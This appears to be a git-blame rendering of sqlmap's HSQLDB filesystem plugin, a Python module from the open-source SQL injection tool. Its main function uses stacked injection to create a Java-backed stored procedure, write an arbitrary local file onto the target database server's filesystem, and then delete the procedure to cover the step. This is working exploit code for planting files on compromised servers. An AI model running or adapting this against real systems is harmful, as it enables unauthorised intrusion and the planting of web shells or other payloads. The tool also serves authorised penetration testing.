2019-05-08 13:47:52 +03:00
|
|
|
#!/usr/bin/env python
|
2013-06-24 17:53:41 +04:00
|
|
|
|
|
|
|
"""
|
2024-01-04 01:11:52 +03:00
|
|
|
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
2017-10-11 15:50:46 +03:00
|
|
|
See the file 'LICENSE' for copying permission
|
2013-06-24 17:53:41 +04:00
|
|
|
"""
|
|
|
|
|
2020-10-13 11:56:39 +03:00
|
|
|
from lib.core.common import randomStr
|
|
|
|
from lib.core.data import kb
|
|
|
|
from lib.core.data import logger
|
|
|
|
from lib.core.decorators import stackedmethod
|
|
|
|
from lib.core.enums import PLACE
|
|
|
|
from lib.request import inject
|
2013-06-24 17:53:41 +04:00
|
|
|
from lib.core.exception import SqlmapUnsupportedFeatureException
|
|
|
|
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
|
|
|
|
|
|
|
class Filesystem(GenericFilesystem):
|
2019-06-03 11:41:51 +03:00
|
|
|
def readFile(self, remoteFile):
|
2013-07-01 15:01:53 +04:00
|
|
|
errMsg = "on HSQLDB it is not possible to read files"
|
2013-06-24 17:53:41 +04:00
|
|
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
|
|
|
|
2020-10-13 11:56:39 +03:00
|
|
|
@stackedmethod
|
|
|
|
def stackedWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
|
2023-03-30 16:34:46 +03:00
|
|
|
func_name = randomStr()
|
2020-10-13 12:05:13 +03:00
|
|
|
max_bytes = 1024 * 1024
|
2020-10-13 11:56:39 +03:00
|
|
|
|
2023-03-30 16:34:46 +03:00
|
|
|
debugMsg = "creating JLP procedure '%s'" % func_name
|
2020-10-13 11:56:39 +03:00
|
|
|
logger.debug(debugMsg)
|
|
|
|
|
2023-03-30 16:34:46 +03:00
|
|
|
addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (func_name, max_bytes)
|
2020-10-13 11:56:39 +03:00
|
|
|
addFuncQuery += "LANGUAGE JAVA DETERMINISTIC NO SQL "
|
|
|
|
addFuncQuery += "EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'"
|
|
|
|
inject.goStacked(addFuncQuery)
|
|
|
|
|
|
|
|
fcEncodedList = self.fileEncode(localFile, "hex", True)
|
|
|
|
fcEncodedStr = fcEncodedList[0][2:]
|
|
|
|
fcEncodedStrLen = len(fcEncodedStr)
|
|
|
|
|
|
|
|
if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
|
2020-10-13 12:05:13 +03:00
|
|
|
warnMsg = "as the injection is on a GET parameter and the file "
|
2020-10-13 11:56:39 +03:00
|
|
|
warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
|
|
|
|
warnMsg += "bytes, this might cause errors in the file "
|
|
|
|
warnMsg += "writing process"
|
2022-06-22 13:04:34 +03:00
|
|
|
logger.warning(warnMsg)
|
2020-10-13 11:56:39 +03:00
|
|
|
|
|
|
|
debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
|
|
|
|
logger.debug(debugMsg)
|
|
|
|
|
2020-10-13 12:05:13 +03:00
|
|
|
# Reference: http://hsqldb.org/doc/guide/sqlroutines-chapt.html#src_jrt_procedures
|
2023-03-30 16:34:46 +03:00
|
|
|
invokeQuery = "CALL %s('%s', CAST('%s' AS VARBINARY(%s)))" % (func_name, remoteFile, fcEncodedStr, max_bytes)
|
2020-10-13 11:56:39 +03:00
|
|
|
inject.goStacked(invokeQuery)
|
|
|
|
|
2023-03-30 16:34:46 +03:00
|
|
|
logger.debug("cleaning up the database management system")
|
|
|
|
|
|
|
|
delQuery = "DELETE PROCEDURE %s" % func_name
|
2020-10-13 11:56:39 +03:00
|
|
|
inject.goStacked(delQuery)
|
|
|
|
|
2020-10-13 12:05:13 +03:00
|
|
|
message = "the local file '%s' has been written on the back-end DBMS" % localFile
|
2020-10-13 11:56:39 +03:00
|
|
|
message += "file system ('%s')" % remoteFile
|
|
|
|
logger.info(message)
|